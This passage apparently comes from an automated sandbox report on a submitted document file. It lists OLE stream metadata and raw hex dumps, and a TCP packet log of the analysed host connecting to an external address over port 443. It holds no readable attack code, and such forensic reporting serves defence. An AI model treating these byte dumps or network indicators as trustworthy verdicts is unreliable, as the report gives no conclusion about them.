                                                                                              Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                              File Type:data
                                                                                              Stream Size:72
                                                                                              Entropy:3.44607361183
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . j . 8 . . . \\ . $ . . .
                                                                                              Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 c8 99 dc 85 78 85 94 91 6a 98 38 98 f8 91 5c 92 24 93 c0 92
                                                                                              Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 24
                                                                                              General
                                                                                              Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                              File Type:data
                                                                                              Stream Size:24
                                                                                              Entropy:2.14624062518
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:' . ' . ' . ' . ' . ' . ( . ) . * . + . , . - .
                                                                                              Data Raw:27 00 27 00 27 00 27 00 27 00 27 00 28 00 29 00 2a 00 2b 00 2c 00 2d 00
                                                                                              Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                              General
                                                                                              Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                              File Type:data
                                                                                              Stream Size:16
                                                                                              Entropy:2.22460175271
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:' . . . ' . 7 . . . . . - . . .
                                                                                              Data Raw:27 00 00 00 27 00 37 00 01 80 01 80 2d 00 00 80
                                                                                              Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 72
                                                                                              General
                                                                                              Stream Path:\x18496\x16923\x17194\x17910\x18229
                                                                                              File Type:data
                                                                                              Stream Size:72
                                                                                              Entropy:3.42690816917
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:( . ) . + . , . . . D . . . . . . . . . . . . . A . C . G . I . E . E . B . B . B . B . . . D . . . . . . . . . H . F . ( . ) . + . , . * . * .
                                                                                              Data Raw:28 00 29 00 2b 00 2c 00 02 01 44 01 01 80 01 80 01 80 01 80 ff 7f ff 7f 41 01 43 01 47 01 49 01 45 01 45 01 42 01 42 01 42 01 42 01 02 01 44 01 00 00 00 00 00 00 00 00 48 01 46 01 28 00 29 00 2b 00 2c 00 2a 00 2a 00
                                                                                              Stream Path: \x18496\x16925\x17915\x17884\x17404\x18472, File Type: data, Stream Size: 48
                                                                                              General
                                                                                              Stream Path:\x18496\x16925\x17915\x17884\x17404\x18472
                                                                                              File Type:data
                                                                                              Stream Size:48
                                                                                              Entropy:3.09028891162
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:d6 01 bc 06 bf 06 c0 06 be 06 bd 06 be 06 be 06 08 80 0d 80 08 80 08 80 00 00 00 80 00 00 00 80 00 00 00 80 ff ff ff 80 00 80 01 80 01 80 00 80
                                                                                              Stream Path: \x18496\x17100\x16808\x15086\x18162, File Type: data, Stream Size: 12
                                                                                              General
                                                                                              Stream Path:\x18496\x17100\x16808\x15086\x18162
                                                                                              File Type:data
                                                                                              Stream Size:12
                                                                                              Entropy:2.35538854221
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . @ . @ . @ .
                                                                                              Data Raw:ed 01 bd 02 be 02 40 01 40 01 40 01
                                                                                              Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 68
                                                                                              General
                                                                                              Stream Path:\x18496\x17163\x16689\x18229
                                                                                              File Type:data
                                                                                              Stream Size:68
                                                                                              Entropy:2.82308111133
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:67 01 d2 01 d4 01 da 01 dc 01 de 01 e0 01 e2 01 e4 01 e6 01 e8 01 f1 01 b8 02 b9 02 ba 02 bb 02 bc 02 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00
                                                                                              Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 18
                                                                                              General
                                                                                              Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                              File Type:data
                                                                                              Stream Size:18
                                                                                              Entropy:2.82188819553
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:- . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:2d 00 ff 02 0a 04 ff 02 00 00 ff 02 09 04 08 04 0a 04
                                                                                              Stream Path: \x18496\x17165\x17380\x17074, File Type: big endian ispell 3.0 hash file,, Stream Size: 616
                                                                                              General
                                                                                              Stream Path:\x18496\x17165\x17380\x17074
                                                                                              File Type:big endian ispell 3.0 hash file,
                                                                                              Stream Size:616
                                                                                              Entropy:4.30757547024
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . X . b . h . l . o . w . z . ~ . . . . . . . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . . . r . r . r . r . r . r . r . r . r . ( . r . r . r . . . r . r . r . r . r . r . r . r . r . r . r . r . . . i . . . . . . . . . . . . . . . . . . . G . . . . . . . U . . .
                                                                                              Data Raw:96 01 b0 02 b1 02 b4 02 b5 02 b6 02 b7 02 c5 02 de 02 f6 02 fa 02 fe 02 0e 03 13 03 16 03 1f 03 34 03 58 03 62 03 68 03 6c 03 6f 03 77 03 7a 03 7e 03 81 03 82 03 87 03 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80
                                                                                              Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 462
                                                                                              General
                                                                                              Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                              File Type:data
                                                                                              Stream Size:462
                                                                                              Entropy:5.65624965343
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . J . K . M . . . . . . . . . . . . . . . ( . + . - . / . 4 . 9 . A . K . N . P . Z . ] . a . c . n . q . t . v . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:09 00 0a 00 0b 00 0d 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 4a 01 4b 01 4d 01 06 02 08 02 0b 02 0e 02 16 02 19 02 1a 02 28 02 2b 02 2d 02 2f 02 34 02 39 02 41 02 4b 02 4e 02 50 02 5a 02 5d 02 61 02 63 02 6e 02 71 02 74 02 76 02 7d 02 82 02 85 02 87 02 8a 02 8c 02 8e 02 90 02 93 02 95 02 97 02 99 02 9d 02 9f 02 a1 02 a3 02 a6 02 a8 02 aa 02 ac 02 ae 02 dc 03
                                                                                              Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 198
                                                                                              General
                                                                                              Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                                                              File Type:data
                                                                                              Stream Size:198
                                                                                              Entropy:5.13973778183
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . J . K . M . P . Z . . . . . . . . . . . . . . . o . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e . d . . . . . L . . . . . . . . . K . . . . . . . . . . . c . 4 . 3 . . . . . . . . . f . 5 . . . . . . . . . . . . .
                                                                                              Data Raw:09 00 0a 00 0b 00 4a 01 4b 01 4d 01 50 02 5a 02 b0 02 b3 02 b4 02 b5 02 b6 02 b7 02 f6 02 6f 03 77 03 82 03 d5 03 da 03 dc 03 df 03 e1 03 e7 03 f2 03 f4 03 f7 03 fa 03 ff 03 00 04 01 04 02 04 03 04 00 00 00 00 00 00 00 00 00 00 9a 06 00 00 00 00 00 00 00 00 a9 06 00 00 00 00 aa 06 9d 03 a1 03 a2 03 9c 03 00 00 00 00 00 00 ab 06 a2 03 93 06 93 06 d6 03 00 00 a4 06 a8 06 9a 06 a7 06
                                                                                              Stream Path: \x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934, File Type: iAPX 286 executable small model (COFF) not stripped, Stream Size: 54
                                                                                              General
                                                                                              Stream Path:\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
                                                                                              File Type:iAPX 286 executable small model (COFF) not stripped
                                                                                              Stream Size:54
                                                                                              Entropy:3.90578757109
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:J . K . M . N . P . Q . S . T . U . . . L . L . O . O . R . R . O . V . e . . . . . . . . . E . ^ . w . . .
                                                                                              Data Raw:4a 01 4b 01 4d 01 4e 01 50 01 51 01 53 01 54 01 55 01 00 00 4c 01 4c 01 4f 01 4f 01 52 01 52 01 4f 01 56 01 65 80 98 80 9b 80 af 80 c8 80 45 81 5e 81 77 81 db 81
                                                                                              Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 72
                                                                                              General
                                                                                              Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                              File Type:data
                                                                                              Stream Size:72
                                                                                              Entropy:3.00322402909
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:( . ) . * . + . , . - . . . . . . . . . . . . . - . - . - . - . - . - . . . . . . . . . . . . . . . . . . . . . . . . . ( . ) . . . + . , . . .
                                                                                              Data Raw:28 00 29 00 2a 00 2b 00 2c 00 2d 00 c0 02 c1 02 c3 02 c4 02 c2 02 bf 02 2d 00 2d 00 2d 00 2d 00 2d 00 2d 00 04 80 04 80 04 80 04 80 04 80 00 80 00 00 00 00 00 00 00 00 00 00 00 00 28 00 29 00 02 01 2b 00 2c 00 00 00
                                                                                              Stream Path: \x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522, File Type: data, Stream Size: 72
                                                                                              General
                                                                                              Stream Path:\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
                                                                                              File Type:data
                                                                                              Stream Size:72
                                                                                              Entropy:3.28528343517
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . H . J . L . N . T . U . . . ' . ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:b4 02 b4 02 b4 02 b4 02 b5 02 b5 02 1f 03 1f 03 1f 03 48 03 4a 03 4c 03 4e 03 54 03 55 03 ce 02 27 03 29 03 95 03 95 03 95 03 95 03 99 03 99 03 95 03 95 03 95 03 98 03 98 03 97 03 97 03 9a 03 9a 03 96 03 96 03 96 03
                                                                                              Stream Path: \x18496\x17548\x17905\x17589\x15279\x16953\x17905, File Type: big endian ispell 3.0 hash file,, Stream Size: 1536
                                                                                              General
                                                                                              Stream Path:\x18496\x17548\x17905\x17589\x15279\x16953\x17905
                                                                                              File Type:big endian ispell 3.0 hash file,
                                                                                              Stream Size:1536
                                                                                              Entropy:4.91390249379
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . X . X . X . b . b . b . h . l . l . l . o . o . o . o . w . w . w . w . w . w . z . z . z . z . z . z . z . ~ . ~ . ~ . ~ . ~ . ~ . ~ . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:96 01 96 01 96 01 96 01 96 01 96 01 96 01 b0 02 b1 02 b1 02 b1 02 b4 02 b4 02 b4 02 b4 02 b5 02 b5 02 b5 02 b6 02 b7 02 b7 02 c5 02 c5 02 c5 02 c5 02 c5 02 c5 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 de 02 f6 02 f6 02 f6 02 fa 02 fe 02 fe 02 fe 02 fe 02 fe 02 fe 02 0e 03 0e 03 0e 03 0e 03 0e 03 13 03 13 03
                                                                                              Stream Path: \x18496\x17548\x17905\x17589\x18479, File Type: big endian ispell 3.0 hash file,, Stream Size: 7280
                                                                                              General
                                                                                              Stream Path:\x18496\x17548\x17905\x17589\x18479
                                                                                              File Type:big endian ispell 3.0 hash file,
                                                                                              Stream Size:7280
                                                                                              Entropy:4.53464027657
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:96 01 96 01 96 01 96 01 96 01 96 01 96 01 96 01 96 01 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b0 02 b1 02 b1 02 b1 02 b1 02 b1 02 b1 02 b1 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b4 02 b5 02 b5 02 b5 02 b5 02 b5 02 b5 02 b5 02 b5 02 b5 02 b5 02 b6 02 b6 02 b6 02 b6 02 b6 02 b6 02 b6 02 b6 02 b6 02 b7 02 b7 02 b7 02 b7 02 b7 02 b7 02
                                                                                              Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 32
                                                                                              General
                                                                                              Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                                                              File Type:data
                                                                                              Stream Size:32
                                                                                              Entropy:2.76201589562
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . v . . . . . v . . . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:f8 01 f8 01 76 01 8d 07 00 00 76 01 00 00 00 00 02 00 00 80 01 01 00 80 00 00 00 00 ab 06 8e 07
                                                                                              Stream Path: \x18496\x17740\x16680\x16951\x17551\x16879\x17768, File Type: data, Stream Size: 4
                                                                                              General
                                                                                              Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                                                                              File Type:data
                                                                                              Stream Size:4
                                                                                              Entropy:1.0
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:- . - .
                                                                                              Data Raw:2d 00 2d 00
                                                                                              Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 2564
                                                                                              General
                                                                                              Stream Path:\x18496\x17742\x17589\x18485
                                                                                              File Type:data
                                                                                              Stream Size:2564
                                                                                              Entropy:6.51629186886
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . M . . . . . . . . . . . . . . . . . . . . . . . . ! . " . # . $ . % . & . ' . ( . ) . * . + . , . - . . . / . 0 . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . y . z . { . | . } . ~ . . . . . . . . . . . . . . . . . A . B . C . D . E . F . G . H . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . n . o . p .
                                                                                              Data Raw:00 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 e9 83 4d 84 15 85 16 85 17 85 18 85 19 85 1a 85 1b 85 1c 85 1d 85 1e 85 1f 85 20 85 21 85 22 85 23 85 24 85 25 85 26 85 27 85 28 85 29 85 2a 85 2b 85 2c 85 2d 85 2e 85 2f 85 30 85 31 85 32 85 33 85 34 85 35 85 36 85 37 85 38 85
                                                                                              Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 368
                                                                                              General
                                                                                              Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                              File Type:data
                                                                                              Stream Size:368
                                                                                              Entropy:4.71807656335
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:s . . . Z . \\ . ^ . ` . b . d . f . h . j . k . m . o . p . r . s . u . w . y . { . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . [ . ] . _ . a . c . e . g . i . ] . l . n . @ . q . @ . t . v . x . z . | . ~ . | . . . . . i . . . . . . . . . c . . . ~ . @ . . . . .
                                                                                              Data Raw:73 00 12 01 5a 01 5c 01 5e 01 60 01 62 01 64 01 66 01 68 01 6a 01 6b 01 6d 01 6f 01 70 01 72 01 73 01 75 01 77 01 79 01 7b 01 7d 01 7f 01 80 01 82 01 85 01 86 01 88 01 8a 01 8b 01 8d 01 8e 01 90 01 91 01 92 01 93 01 95 01 97 01 99 01 9b 01 9d 01 9f 01 a1 01 a3 01 a5 01 a7 01 a9 01 ab 01 ad 01 af 01 b1 01 b3 01 b5 01 b7 01 b9 01 bb 01 bd 01 be 01 c0 01 c2 01 c4 01 c6 01 c8 01 ca 01
                                                                                              Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: iAPX 286 executable small model (COFF) not stripped, Stream Size: 396
                                                                                              General
                                                                                              Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                              File Type:iAPX 286 executable small model (COFF) not stripped
                                                                                              Stream Size:396
                                                                                              Entropy:4.03368051264
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:J . . . . . . . . . . . . . . $ . + . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . A . 3 . . . A . . . 3 . 3 . . . A . A . 3 . . . 3 . 3 . 3 . 3 . 3 . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . F . @ .
                                                                                              Data Raw:4a 01 02 02 06 02 10 02 13 02 19 02 1d 02 20 02 24 02 2b 02 34 02 b2 02 b9 03 c5 03 d5 03 da 03 dc 03 df 03 e1 03 e7 03 e9 03 f0 03 f2 03 f4 03 f7 03 f8 03 fa 03 fd 03 ff 03 00 04 01 04 02 04 03 04 01 81 01 ac 01 80 01 ad 01 ac 01 80 01 ad 01 ac 01 ac 01 80 01 80 33 80 01 80 41 80 33 80 01 80 41 81 13 80 33 80 33 81 c2 80 41 80 41 80 33 80 01 80 33 80 33 81 33 80 33 80 33 80 33 80
                                                                                              Stream Path: \x18496\x17998\x17512\x15799\x17636\x17203\x17073, File Type: data, Stream Size: 128
                                                                                              General
                                                                                              Stream Path:\x18496\x17998\x17512\x15799\x17636\x17203\x17073
                                                                                              File Type:data
                                                                                              Stream Size:128
                                                                                              Entropy:4.07162173256
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . . . . . . . . . . # . % . ' . ) . ) . . . 0 . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . V . . . V . V . V . . . . . . . . . . . . . . . V . . . V . V .
                                                                                              Data Raw:b0 02 b0 02 b6 02 b6 02 fa 02 fa 02 fe 02 13 03 1f 03 1f 03 1f 03 1f 03 1f 03 1f 03 1f 03 1f 03 90 00 fb 02 90 00 73 03 90 00 fb 02 03 03 03 03 c6 02 23 03 25 03 27 03 29 03 29 03 2e 03 30 03 90 00 88 06 90 00 73 03 90 00 88 06 8a 06 8a 06 8b 06 8b 06 8b 06 90 06 8f 06 90 06 8e 06 8d 06 56 00 89 06 56 00 56 00 56 00 89 06 8a 06 8a 06 8c 06 8c 06 8c 06 91 06 56 00 91 06 56 00 56 00

                                                                                              Network Behavior

                                                                                              Network Port Distribution

                                                                                              TCP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 14, 2021 00:57:09.375694036 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.375749111 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:09.375907898 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.380839109 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.380891085 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:09.843491077 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:09.843803883 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.982630014 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.982683897 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:09.983289957 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:09.983445883 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:09.984976053 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.028949022 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152028084 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152159929 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.152209997 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152237892 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152266026 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152295113 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.152342081 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.152362108 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.152410030 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.300937891 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.300996065 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301135063 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301168919 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301224947 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301239967 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301251888 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301275969 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301302910 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301322937 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301347017 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301361084 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301379919 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301428080 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.301439047 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.301496983 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.449937105 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.449990988 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450109005 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450146914 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450170994 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450221062 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450234890 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450258970 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450287104 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450309992 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450330019 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450342894 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450371981 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450412035 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.450424910 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.450480938 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.598846912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.598905087 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.598984003 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599021912 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599041939 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599098921 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599111080 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599175930 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599176884 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599201918 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599230051 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599260092 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599277020 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599287033 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599319935 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599327087 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599342108 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599399090 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599539995 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599581003 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599623919 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599638939 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599659920 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599719048 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.599730968 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.599776983 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.600022078 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.600063086 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.600107908 CET49752443192.168.2.352.219.96.48
                                                                                              Dec 14, 2021 00:57:10.600121975 CET4434975252.219.96.48192.168.2.3
                                                                                              Dec 14, 2021 00:57:10.600138903 CET49752443192.168.2.352.219.96.48
